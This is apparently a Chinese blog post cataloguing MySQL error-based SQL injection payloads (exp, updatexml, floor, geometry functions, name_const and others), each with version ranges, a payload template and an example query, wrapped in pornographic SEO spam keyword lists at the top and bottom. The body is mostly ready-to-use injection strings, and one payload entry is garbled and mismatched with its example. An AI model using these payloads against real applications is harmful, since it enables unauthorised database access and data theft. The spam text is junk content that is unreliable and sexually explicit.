<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      sql報錯注入(使用方式與適用版本)

      1. exp()報錯注入
        版本要求:5.5< mysql版本 <5.6
        payload
        and (exp(~(select * from (操作代碼) a)))
        
        列子:
        SELECT * FROM db WHERE db='test' and (exp(~(select * from (SELECT VERSION()) a)))
        
      2. GeometryCollection()報錯注入
        版本要求:5.5< mysql版本 <5.6
        payload:
        and geometrycollection((select * from(select * from (操作代碼)a)b))
        
        例子:
        SELECT * FROM db WHERE db='test' and geometrycollection((select * from(select * from (SELECT VERSION())a)b))
        
      3. UpdateXml()報錯注入
        版本要求:截至8.0.13可用
        payload:
        and updatexml(1,concat(0x7e,(操作代碼),0x7e),3)
        
        例子:
        SELECT * FROM db WHERE db='test' and updatexml(1,concat(0x7e,(SELECT DATABASE()),0x7e),3)
        
      4. NAME_CONST()報錯注入
        版本要求:截至8.0.13可用
        payload:
        and exists(select * from (select * from(select name_const(操作代碼,0)) a join (select name_const(操作代碼,0)) b)c)
        
        例子:
        SELECT * FROM db WHERE db='test' and exists(select * from (select * from(select name_const(VERSION(),0)) a join (select name_const(VERSION(),0)) b)c)
        
      5. join()報錯注入
        • 爆破列名
          版本要求:截至8.0.13可用
          payload:UNION SELECT * FROM (SELECT 1) a JOIN (SELECT 2) b
          例如:
          SELECT * FROM userid WHERE id = '1' UNION SELECT * FROM (SELECT 1) a JOIN (SELECT 2) b
      6. linestring()報錯注入
        版本:5.5< mysql版本 <5.6
        and linestring((select * from(select * from(select user())a)b));
        
        例:
        SELECT * FROM db WHERE db='test' and linestring((select * from(select * from(select user())a)b));
        
      7. multilinestring()報錯注入
        版本:5.5< mysql版本 <5.6
        and multilinestring((select * from(select * from(select VERSION())a)b));
        
        列:
        SELECT * FROM db WHERE db='test' and multilinestring((select * from(select * from(select VERSION())a)b));
        
      8. multpolygon()報錯注入
        版本:5.5< mysql版本 <5.6
        payload:and multpolygon (()select * from(selectuser () )a)b );
        
        例:
        SELECT * FROM db WHERE db='test' and multipoint((select * from(select * from(select VERSION())a)b));
        
      9. polygon ()報錯注入
        版本:5.5< mysql版本 <5.6
        and polygon((select * from(select * from(select VERSION())a)b));
        
        例:
        SELECT * FROM db WHERE db='test' and polygon((select * from(select * from(select VERSION())a)b));
        
      10. floor()報錯注入
        • 第一種(常用)
          and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a);
          
          例:
          SELECT * FROM category WHERE cat_id = 1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
          
        • 第二種(薛定諤的貓版本,不常用)
          union select count(*), concat((payload), floor(rand()*2)) as a from information_schema.tables group by a;
          
          例:
          SELECT * FROM category WHERE cat_id = 1 union select count(*), concat((SELECT VERSION()), floor(rand()*2)) as a from information_schema.tables group by a;
          

      參考文章
      http://www.rzrgm.cn/wocalieshenmegui/p/5917967.html

      posted @ 2023-10-29 11:24  NPC001  閱讀(107)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 综合色一色综合久久网| 欧美粗大猛烈老熟妇| 国产福利酱国产一区二区| 亚洲国产精品久久久久婷婷图片| 久热色精品在线观看视频| 成人无码午夜在线观看| 无锡市| 亚洲综合一区二区三区在线| 国语精品自产拍在线观看网站| 又黄又刺激又黄又舒服| 国产高清精品在线91| 日本黄韩国色三级三级三| 一本一本久久a久久综合精品| 日韩一区二区三区av在线| 亚洲精品无码在线观看| 国产熟女老阿姨毛片看爽爽| 免费无码一区无码东京热| а√在线中文网新版地址在线| 国产精品蜜臀av在线一区| 亚洲欧洲日韩国内高清| 克拉玛依市| 日日摸夜夜添夜夜添国产三级| 国产精品午夜剧场免费观看| 无码高潮爽到爆的喷水视频| 免费国产拍久久受拍久久| 亚洲国产成人资源在线| 国产福利精品一区二区| 蜜臀精品视频一区二区三区 | 亚洲精品日韩在线丰满| 国产玖玖视频| 黄色三级亚洲男人的天堂| 国内熟妇与亚洲洲熟妇妇| 在线a级毛片免费视频| 麻豆国产传媒精品视频| 色综合中文字幕色综合激情| 被c到高潮疯狂喷水国产 | 成人精品区| 国产短视频精品一区二区| 日本不卡不二三区在线看| 久久久www成人免费精品| 亚洲av免费成人精品区|